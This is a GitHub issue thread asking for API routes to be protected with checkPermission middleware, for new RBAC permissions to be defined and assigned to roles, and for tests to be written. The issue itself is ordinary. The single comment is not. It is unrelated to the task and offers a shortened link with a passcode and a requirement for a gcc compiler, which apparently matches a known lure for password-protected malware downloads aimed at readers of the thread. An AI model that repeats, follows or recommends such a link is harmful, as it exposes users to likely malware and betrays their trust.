### ISSUE TITLE
Protect Routes with checkPermission Middleware, Update Permissions, and Write Test Cases

### ISSUE THREAD

**Issue by sanjaysah101** [ansopedia/users#46]
**Description**:
We need to enhance the security of our application by protecting specific routes with the `checkPermission` middleware. Additionally, we need to ensure that the relevant permissions are created and assigned to roles accordingly. Finally, we need to write test cases to validate that the permission checks work as expected.

### Tasks:
1. **Update `rbac.constant.ts`**:
   - Add new permission constants for routes that require protection.
   - Ensure that these permissions are descriptive and relevant to the actions performed by the route.

2. **Apply `checkPermission` Middleware**:
   - Protect the targeted routes using the `checkPermission` middleware.
   - Ensure that only users with the appropriate permissions can access these routes.

3. **Create New Permissions**:
   - Identify the routes that require new permissions.
   - Create these permissions inside the `rbac.constant.ts` file.

4. **Assign Permissions to Roles**:
   - Ensure that the newly created permissions are assigned to the appropriate roles.
   - Consider creating a migration script or manual steps to update roles with the new permissions.

5. **Write Test Cases**:
   - Write unit tests to validate that routes are properly protected by the `checkPermission` middleware.
   - Write test cases to ensure that users with correct permissions can access the routes, while others are denied access.
   - Ensure that all new permissions are covered by tests, including edge cases and error scenarios.

### Acceptance Criteria:
- The targeted routes should only be accessible by users with the relevant permissions.
- The new permissions should be clearly defined in `rbac.constant.ts`.
- The appropriate roles should be updated to include the new permissions.
- Tests should confirm that routes are protected, permissions are enforced, and access control works as expected.
- Ensure that tests pass successfully in the CI pipeline.

### Example Routes:
- `/api/resource/create`
- `/api/resource/update`
- `/api/resource/delete`

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
